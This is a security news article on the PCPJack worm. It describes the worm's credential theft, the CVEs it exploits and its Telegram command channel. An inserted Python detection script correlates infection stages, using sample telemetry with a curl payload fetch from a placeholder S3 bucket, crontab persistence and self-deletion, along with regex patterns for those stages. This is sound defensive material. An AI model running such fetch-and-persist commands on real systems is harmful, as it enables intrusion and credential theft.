    ‘PCPJack’ Worm Removes TeamPCP Infections, Steals Credentials

By The Tech Guy, May 8, 2026

    A threat actor has launched a campaign to clean up environments infected by the infamous TeamPCP hacking group and deploy its own malicious tools, SentinelOne reports.

    Active since late April, the campaign relies on a malware framework targeting credentials across multiple cloud environments and capable of propagating itself.

    SentinelOne has named the framework PCPJack, due to its focus on removing from the infected systems any tools and artifacts associated with TeamPCP, the hacking group behind a recent flurry of supply chain attacks targeting multiple open source software ecosystems.

    “Many of the services targeted by the PCPJack framework are similar to the early TeamPCP/PCPCat campaigns from December 2025, before the high-visibility campaigns of early 2026 brought significant attention to TeamPCP and purportedly led to changes in group membership. We believe this could be a former operator who is deeply familiar with the group’s tooling,” SentinelOne says.

A PCPJack infection, the cybersecurity company says, begins with a Linux shell script. Before setting up the environment and fetching additional payloads, the script searches the system for processes and artifacts matching known TeamPCP infections and removes them.

    Next, the script creates a Python virtual environment, downloads six modules from an AWS S3 bucket, renames them, establishes persistence, launches the first module, which serves as the main framework orchestrator, and then deletes itself.

    The remaining modules, which are imported by the orchestrator, were designed for specific purposes, including credential parsing, lateral movement, command-and-control (C&C) message encryption, cloud IP range lookups, and cloud scanning.

    From the local system, PCPJack can steal .env and configuration files, environment variables, SSH keys, cryptocurrency wallets, credentials, and tokens for various web apps and cloud services, including AWS, Kubernetes, Docker, Gmail, GitHub, Office 365/Outlook, RayML, Slack, and WordPress.

    “The types of credentials collected by the framework suggest PCPJack’s targeting motivations are primarily to conduct spam campaigns and financial fraud, or to simply monetize stolen credentials to actors with these focuses. The inclusion of enterprise productivity software like Slack and business database services expands the focus to extortion attacks,” SentinelOne says.

    PCPJack performs system reconnaissance to identify assets the machine connects to, attempts lateral movement, and downloads Parquet files from Common Crawl to identify additional targets over the internet and attempt to infect them.

    The spreading module targets known vulnerabilities in web applications, including CVE-2025-29927 (Next.js), CVE-2025-55182 (React2Shell), CVE-2026-1357 (WPVivid Backup plugin for WordPress), CVE-2025-9501 (W3 Total Cache plugin for WordPress), and CVE-2025-48703 (CentOS Web Panel).

    PCPJack also attempts to use the extracted credentials to propagate across Kubernetes, Docker, Redis, RayML, and MongoDB deployments, and leverages SSH keys to execute the initial script on remote machines. The framework uses Telegram for C&C and encrypts the data sent to its channel.
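The infection chain described above (a shell script that creates a Python virtual environment, pulls modules from an S3 bucket, installs persistence, deletes itself and then talks to Telegram for C&C) is a sequence a defender can correlate in process telemetry. The following is an added detection example, not SentinelOne's or the article's code. The events are constructed process-execution records in newline-delimited JSON, in the shape a Linux EDR or auditd-to-JSON pipeline might emit; the field names `host`, `ts`, `parent`, `comm`, `cmdline` and `dest`, the bucket name and the file paths are all assumptions, not indicators from the report.

```python
"""Heuristic correlation of the PCPJack-style infection chain over process
telemetry. Added example; field names and sample values are assumptions."""
import json
import re
from collections import defaultdict

# Constructed sample telemetry: a developer creating a venv (benign) and a host
# whose command sequence matches the chain the article describes.
SAMPLE_EVENTS = """
{"host": "dev01", "ts": 100, "parent": "bash", "comm": "python3", "cmdline": "python3 -m venv .venv"}
{"host": "dev01", "ts": 105, "parent": "bash", "comm": "pip", "cmdline": "pip install requests"}
{"host": "web07", "ts": 201, "parent": "sh", "comm": "python3", "cmdline": "python3 -m venv /tmp/.x/venv"}
{"host": "web07", "ts": 202, "parent": "sh", "comm": "curl", "cmdline": "curl -s https://EXAMPLE-BUCKET.s3.amazonaws.com/m1 -o /tmp/.x/a"}
{"host": "web07", "ts": 203, "parent": "sh", "comm": "mv", "cmdline": "mv /tmp/.x/a /tmp/.x/orchestrator.py"}
{"host": "web07", "ts": 204, "parent": "sh", "comm": "crontab", "cmdline": "crontab -"}
{"host": "web07", "ts": 205, "parent": "sh", "comm": "rm", "cmdline": "rm -f /tmp/.x/setup.sh"}
{"host": "web07", "ts": 210, "parent": "python3", "comm": "python3", "cmdline": "python3 /tmp/.x/orchestrator.py", "dest": "api.telegram.org"}
"""

# One regex per stage of the chain, applied to the command line. Each stage is
# weak on its own (developers create venvs all day); the signal is several
# distinct stages on the same host inside a short window.
STAGE_PATTERNS = {
    "venv_create": re.compile(r"\bpython[0-9.]*\s+-m\s+venv\b|\bvirtualenv\b"),
    "s3_fetch": re.compile(r"\b(curl|wget)\b.*?(s3[.\-][a-z0-9.\-]*amazonaws\.com|\bs3://)"),
    "persistence": re.compile(r"\bcrontab\b|/etc/cron|\bsystemctl\s+(enable|--user)\b|\.bashrc\b|/etc/rc\.local"),
    "self_delete": re.compile(r"\brm\s+(-\w+\s+)*\S*\.sh\b"),
}
C2_DOMAIN = "api.telegram.org"  # the C&C channel named in the article


def parse_events(text):
    """Parse newline-delimited JSON into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event):
    """Return the set of chain stages a single event matches."""
    stages = {name for name, pat in STAGE_PATTERNS.items()
              if pat.search(event.get("cmdline", ""))}
    if event.get("dest", "").endswith(C2_DOMAIN):
        stages.add("telegram_c2")
    return stages


def find_suspicious_hosts(events, window=600, min_stages=3):
    """Correlate stages per host over a sliding time window.

    Returns {host: sorted stage names} for every host on which at least
    min_stages distinct stages occur within `window` seconds of each other.
    """
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    hits = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        best = set()
        for i, start in enumerate(evs):
            seen = set()
            for ev in evs[i:]:
                if ev["ts"] - start["ts"] > window:
                    break
                seen |= classify(ev)
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            hits[host] = sorted(best)
    return hits


if __name__ == "__main__":
    for host, stages in find_suspicious_hosts(parse_events(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(stages)}")
```

Run against the sample, only `web07` is reported, with all five stages; `dev01` shows a lone venv creation and stays below the threshold. The thresholds are deliberately conservative: a single stage should feed a hunt query, not an alert, and the window and minimum stage count should be tuned against a baseline of the environment's own build and deployment activity before the rule goes into production.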

    During its investigation into the framework, SentinelOne identified a second toolset associated with the threat actor, which includes Sliver implants and credential theft across dozens of cloud services, including Anthropic, Digital Ocean, Discord, Google API, and others, as well as those targeted by PCPJack.

    “Overall, the two toolsets are well developed and indicate that the owner values making code as a modular framework, despite some redundancies in behavior. The occasional operational security lapses were interesting, particularly their choice to encrypt everything except for Telegram credentials and their own alleged infrastructure,” SentinelOne notes.

    Related: Vendor Says Daemon Tools Supply Chain Attack Contained

    Related: AI Coding Agents Could Fuel Next Supply Chain Crisis

    Related: 1,800 Hit in Mini Shai-Hulud Attack on SAP, Lightning, Intercom

    Related: Sophisticated Quasar Linux RAT Targets Software Developers
